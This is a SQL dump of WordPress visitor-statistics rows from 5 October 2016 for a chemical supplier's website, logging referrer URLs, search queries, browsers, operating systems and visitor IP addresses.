INSERT INTO `wp_statistics_visitor` VALUES (411, '2016-10-05', 'https://www.google.co.in/', 'Chrome', 'Windows', '19.0.1084.52', '', '157.49.225.206', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (412, '2016-10-05', 'https://www.miller-stephenson.com/miller/release_agents.html', 'Chrome', 'Windows', '12.0.742.122', '', '123.125.125.155', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (413, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '12.0.742.122', '', '36.110.170.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (414, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '12.0.742.122', '', '36.110.170.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (415, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '12.0.742.122', '', '220.181.124.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (416, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0ahUKEwin3s3Cg8TPAhVL5oMKHc7QBWoQFgg3MAc&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FResins%2520Epirez.pdf&usg=AFQjCNGVzFIsQ8050v7nTQOdtWZNXNjENw&sig2=owKf29DKIxr3kOJQdF1IzQ', 'MSIE', 'Windows', '11.0', '', '209.40.237.90', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (417, '2016-10-05', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '134.223.116.153', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (418, '2016-10-05', 'https://www.google.com.mx/', 'Firefox', 'Windows', '49.0', '', '187.144.59.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (419, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/fsh-series/', 'Chrome', 'Windows', '53.0.2785.116', '', '210.244.8.7', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (420, '2016-10-05', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '173.241.184.157', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (421, '2016-10-05', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwjG1NvjhcTPAhUHHGkKHffZC_8YABAA&sig=AOD64_2x5gTZl7DSMNAM_rpkUliHbk8sXg&rct=j&frm=1&q=&ved=0ahUKEwjWmdjjhcTPAhVM_IMKHeazCcsQ0QwIGg&adurl=', 'MSIE', 'Windows', '10.0', '', '204.187.34.100', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (422, '2016-10-05', 'https://www.google.com.mx/', 'Chrome', 'Windows', '53.0.2785.116', '', '189.176.211.6', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (423, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '96.65.85.170', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (424, '2016-10-05', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '122.164.133.247', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (425, '2016-10-05', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjg14OEhsTPAhWERl4KHQQKBBEYABAD&sig=AOD64_16KXWnG8uZQNAhWZ7bd0FIglIqCQ&ctype=4&rct=j&q=&ved=0ahUKEwipt_mDhsTPAhVi1oMKHf2aChMQwgUIJCgC&adurl=', 'MSIE', 'Windows', '11.0', '', '63.97.12.226', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (426, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Chrome OS', '53.0.2785.103', '', '24.252.206.68', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (427, '2016-10-05', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjDyJWrh8TPAhVE04MKHUB-CyAQFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-750%2C%2520752.pdf&usg=AFQjCNHltHLN6m1eOcSeQj-60KcJjV9izA', 'MSIE', 'Windows', '11.0', '', '184.69.42.86', '000', 23, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (428, '2016-10-05', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjitOGxh8TPAhXCxXIKHVFiBtgYABAB&sig=AOD64_06_t1SImQ5Pppkr2Fim4ZCSTHBdg&rct=j&q=&ved=0ahUKEwiZ_NOxh8TPAhXC1iwKHQJJDdcQ0QwIIA&adurl=', 'MSIE', 'Windows', '11.0', '', '57.97.111.72', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (429, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/krytox-lubricants/?gclid=CJTQ_dyHxM8CFaHpcgodz7IHXQ', 'MSIE', 'Windows', '11.0', '', '57.97.111.73', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (430, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '98.189.111.163', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (431, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/krytox-lubricants/?gclid=CJTQ_dyHxM8CFaHpcgodz7IHXQ', 'MSIE', 'Windows', '11.0', '', '57.97.111.77', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (432, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/', 'MSIE', 'Windows', '11.0', '', '57.97.111.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (433, '2016-10-05', 'https://www.google.com/aclk?sa=L&ai=DChcSEwi-h4Twh8TPAhVWJYEKHb1mBRwYABAA&sig=AOD64_1qfigRpoW4wFmdQK3XOanG4VU9EQ&rct=j&q=&ved=0ahUKEwiYh4Dwh8TPAhWQdSYKHTGUBOEQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '199.36.133.76', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (434, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwivibn5iMTPAhVDPCYKHR0zDD4QFggjMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=NNlz9X-AsAJoz7rKNw5mqQ', 'MSIE', 'Windows', '11.0', '', '24.151.107.147', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (435, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '216.253.224.166', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (436, '2016-10-05', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '64.128.53.82', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (437, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '44.0.2403.133', '', '70.195.12.65', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (438, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '104.37.40.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (439, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (440, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '98.100.140.226', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (441, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.60.157.77', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (442, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.160', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (443, '2016-10-05', 'https://search.aol.com/aol/search?s_chn=prt_bcontrol-min-g&page=3&v_t=comsearch&q=blow+mold+glass+release+agent&oreq=2af13c7426834663b1fa6150a6e9dc58&s_it=sb-top', 'Chrome', 'Windows', '53.0.2785.143', '', '67.60.20.85', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (444, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.49.209.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (445, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'MSIE', 'Windows', '9.0', '', '180.153.187.150', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (446, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '129.244.56.30', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (447, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '192.249.47.201', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (448, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=72&ved=0ahUKEwiglu7xkMTPAhVn5oMKHRWGBpc4RhAWCCEwAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fts4-krytox-thread-sealant%2F&usg=AFQjCNHD2NOifMeMdUuXH2M4Qa7ulJXgSw', 'MSIE', 'Windows', '11.0', '', '64.83.250.98', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (449, '2016-10-05', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '11.50', '', '54.197.16.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (450, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '208.125.182.142', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (451, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0ahUKEwj7-a75ksTPAhVK4WMKHSUKD08QFgh-MAk&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-teflon-lubricants%2Ftribosys-lubricants%2Fconnector-lubricants%2F&usg=AFQjCNGQFqh5MNloGmHn4ix2G-pLsA_AtA', 'MSIE', 'Windows', '11.0', '', '64.31.121.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (452, '2016-10-05', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiGr6qek8TPAhWJgn4KHe9-CMMYABAA&sig=AOD64_3Zr-Z-1xpe0iekK10QsKfsydgrbg&rct=j&q=&ved=0ahUKEwibpaaek8TPAhVR4WMKHWXuBXQQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '64.80.120.58', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (453, '2016-10-05', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '47.138.212.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (454, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwiD6vvjk8TPAhUEwiYKHd1BAAQQFggoMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fvazo-free-radical-initiator%2F&usg=AFQjCNE0eDDP7jnECRpm1wajDhnBZSun4A&bvm=bv.134495766,d.eWE', 'MSIE', 'Windows', '11.0', '', '204.136.186.158', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (455, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '45.0', '', '134.253.97.171', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (456, '2016-10-05', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiVlqyYlMTPAhWVjGkKHcZUAxkYABAF&sig=AOD64_2RRrPEugQjbSvyZUcx9lEgJ8N-qw&rct=j&q=&ved=0ahUKEwislKiYlMTPAhXm5YMKHQQoCMoQ0QwIJQ&adurl=', 'MSIE', 'Windows', '11.0', '', '50.249.111.145', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (457, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '48.0.2564.97', '', '40.128.104.121', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (458, '2016-10-05', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '66.87.68.169', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (459, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (460, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '71.30.35.112', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (461, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjPr-WpmMTPAhVB_WMKHZOqBi4QFghAMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fflux_removers.html&usg=AFQjCNEvKtf79lVw0OEs7y0HsLNXyU91hw&bvm=bv.134495766,d.cGc', 'MSIE', 'Windows', '11.0', '', '134.167.1.1', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (462, '2016-10-05', 'https://www.bing.com/search?q=Dry+lubricant+MS+-122+SDS&FORM=SSRE', 'MSIE', 'Windows', '9.0', '', '74.94.8.212', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (463, '2016-10-05', 'https://www.miller-stephenson.com/product/plastic-glass-metal-cleaner/', 'Chrome', 'Windows', '53.0.2785.116', '', '108.248.84.190', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (464, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '132.3.33.79', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (465, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwjU3IXbnMTPAhVL6SYKHQp0AjoQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=SJpWElliaQBLddG1F6qD2Q&bvm=bv.134495766,d.eWE', 'MSIE', 'Windows', '11.0', '', '132.3.65.80', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (466, '2016-10-05', 'https://www.miller-stephenson.com/notify-SubZero?aHR0cDovL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb20v;M85T50J2W3lSVksd+I3aPZIVUPILxFCCj8DpOlpTrGQ=', 'MSIE', 'Windows', '11.0', '', '132.3.65.78', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (467, '2016-10-05', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '132.3.65.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (468, '2016-10-05', 'https://www.miller-stephenson.com/tech-support/sds/', 'MSIE', 'Windows', '11.0', '', '132.3.65.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (469, '2016-10-05', 'https://www.google.ca/', 'Chrome', 'Windows', '51.0.2704.84', '', '10.199.68.77', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (470, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '68.193.177.246', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (471, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwie_d_FnsTPAhUBEywKHZoHD_8QFghSMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fxht-s%2F&usg=AFQjCNGTqpiv125xSDouIQX027bI5MG-Hw&bvm=bv.134495766,d.bGg', 'MSIE', 'Windows', '11.0', '', '63.123.143.221', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (472, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '199.89.130.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (473, '2016-10-05', 'https://www.google.com/search?hl=en&source=hp&biw=&bih=&q=where+can+i+get+food+grade+oil&gbv=2&oq=where+can+i+get+food+grade+oil&gs_l=heirloom-hp.3...2015.11593.0.12021.30.12.0.18.18.0.84.646.10.10.0....0...1ac.1.34.heirloom-hp..5.25.696.nj8GPg0pr8s', 'Safari', 'Macintosh', '5.1.9', '', '75.71.103.86', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (474, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '74.7.225.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (475, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwix39vVoMTPAhVD7GMKHWpCAygQFggqMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-122AD.pdf&usg=AFQjCNEHYvrBDicFr_0ThYtNVdYZMxT3lA&bvm=bv.134495766,d.cGc', 'MSIE', 'Windows', '11.0', '', '74.206.96.156', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (476, '2016-10-05', 'https://mmk.mschem.com/miller/pdf/MS-122E,%20143E.pdf', 'Chrome', 'Windows', '53.0.2785.143', '', '107.20.242.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (477, '2016-10-05', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjAubeaocTPAhWTJIEKHWmSCegYABAF&sig=AOD64_1aapYvh8dZ63MR_CY6R1xCKzN5jw&rct=j&q=&ved=0ahUKEwjp2rOaocTPAhWFWSYKHXLRAfUQ0QwIJQ&adurl=', 'MSIE', 'Windows', '11.0', '', '66.208.188.137', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (478, '2016-10-05', 'https://www.google.com.ph/', 'Chrome', 'Windows', '53.0.2785.143', '', '112.198.98.125', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (479, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '206.126.121.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (480, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '65.121.242.8', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (481, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (482, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwj6qZHdpcTPAhVs5YMKHcTuC5wQFghLMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FCuring%2520Agent.pdf&usg=AFQjCNHxwVqX5A1fMEHEn-MeptfpRg-BrQ', 'MSIE', 'Windows', '11.0', '', '199.254.206.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (483, '2016-10-05', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '53.0.2785.143', '', '192.168.10.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (484, '2016-10-05', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (485, '2016-10-05', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1', '', '131.215.220.164', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (486, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '175.197.148.112', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (487, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '192.69.22.76', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (488, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '47.0', '', '192.69.22.76', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (489, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.63.255.98', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (490, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '158.69.192.169', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (491, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '15.0.1', '', '184.173.144.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (492, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwiYmqTqp8TPAhUG7SYKHeaAC10QFghPMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-122AD.pdf&usg=AFQjCNEHYvrBDicFr_0ThYtNVdYZMxT3lA', 'MSIE', 'Windows', '11.0', '', '107.1.156.225', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (493, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.63', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (494, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.94', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (495, '2016-10-05', 'https://www.google.cl/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwiJ68iiqMTPAhWDhJAKHQLyAa8QFggxMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FCuring%2520Agent.pdf&usg=AFQjCNHxwVqX5A1fMEHEn-MeptfpRg-BrQ&bvm=bv.134495766,d.Y2I', 'MSIE', 'Windows', '11.0', '', '200.72.166.181', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (496, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '74.143.227.162', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (497, '2016-10-05', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwjJg96tp8TPAhVG1oMKHfeiAkwQFghNMAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-205%2F&usg=AFQjCNHwZ2VkQ2EkLZn-9yjL6I2BINcdgA&sig2=WR45ghuM6uvS8yRlAicQFg', 'MSIE', 'Windows', '11.0', '', '74.50.162.213', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (498, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '96.225.17.80', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (499, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (500, '2016-10-05', 'https://www.google.com.mx/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwiZ-o2Hq8TPAhVmHGMKHSk_DMkQFggqMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-teflon-lubricants%2Ftribosys-lubricants%2Fconnector-lubricants%2F&usg=AFQjCNGQFqh5MNloGmHn4ix2G-pLsA_AtA', 'MSIE', 'Windows', '11.0', '', '189.180.23.178', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (501, '2016-10-05', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.3', '', '17.229.78.79', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (502, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '48.0.2564.116', '', '96.95.178.61', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (503, '2016-10-05', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.11.83.201', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (504, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '131.215.135.173', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (505, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwjRtqnmr8TPAhUH6oMKHb78C7kQjBAIKDAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2F&usg=AFQjCNHbwMDofHjUU2PB95SWZra5M3XNKA', 'MSIE', 'Windows', '11.0', '', '12.148.204.2', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (506, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.5.25.118', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (507, '2016-10-05', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.7.0', '', '139.184.24.14', '000', 56, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (508, '2016-10-05', 'https://www.miller-stephenson.com/', 'Safari', 'iPhone', '7.0', '', '199.30.25.129', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (509, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '24.177.144.217', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (510, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/connector-lubricants/', 'Firefox', 'Windows', '49.0', '', '12.205.160.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (511, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '128.138.65.86', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (512, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.47.148.137', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (513, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0ahUKEwjbnILNtcTPAhUKVj4KHR6cCwUQFgiFATAJ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fkrytox.html&usg=AFQjCNH0hXOp2FX5gVUfB-buW1gzcf4SHw', 'MSIE', 'Windows', '11.0', '', '68.238.220.3', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (514, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '64.33.177.139', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (515, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '50.235.10.2', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (516, '2016-10-05', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '50.248.88.213', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (517, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '12.251.123.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (518, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '209.113.248.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (519, '2016-10-05', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '174.223.130.56', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (520, '2016-10-05', 'https://www.google.ca/url?url=https://www.miller-stephenson.com/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwjz1eytusTPAhWGej4KHbCrDAcQFggUMAA&usg=AFQjCNHVMV3tSuqMIrrBe8ycLmdO3Xacdw', 'MSIE', 'Windows', '7.0', '', '166.20.224.11', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (521, '2016-10-05', 'https://www.bing.com/search?q=MILLER+STEPHENSON+CHEMICAL+COMPANY&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '208.89.140.11', '000', 3, 0); 
